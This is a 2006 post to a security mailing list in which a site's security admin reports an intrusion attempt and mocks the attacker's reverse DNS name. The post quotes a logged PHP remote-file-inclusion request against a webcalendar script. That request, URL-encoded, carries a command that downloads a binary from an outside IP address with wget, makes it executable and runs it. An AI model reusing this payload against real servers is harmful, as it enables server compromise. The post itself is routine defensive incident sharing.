[Dshield] Reverse name

DigitalNation dshield at digitalnation.ca
Sat Mar 18 05:48:02 GMT 2006


Check out the RV DNS name of this IP (64.62.190.68) that is probing for a
PHP cross scripting hack:

64-62-190-68.cave-18.dialup.torabora.bin-Iaden.com

Here is some of the script so you won't think I am BS'ing you:

---------------------------------------------------
HTTP_PHP_Includedir, 64.62.190.68,
64-62-190-68.cave-18.dialup.torabora.bin-Iaden.com, 64.x.x.x, ,
URL=/webcalendar/send_reminders.php&arg=includedir%3Dhttp://83.16.187.6/cmd.
dat?%26cmd%3Dcd%2520/tmp;wget%252083.16.187.6/haita;chmod%2520744%2520haita;
./haita;echo%.....
----------------------------------------------------

Ha!! Nice...."torabora.bin-Iaden.com"

These guys really want to be liked, don't you think?

------------------
M. McBride
Security Admin
DigitalNation
Vancouver, Canada
 





More information about the list mailing list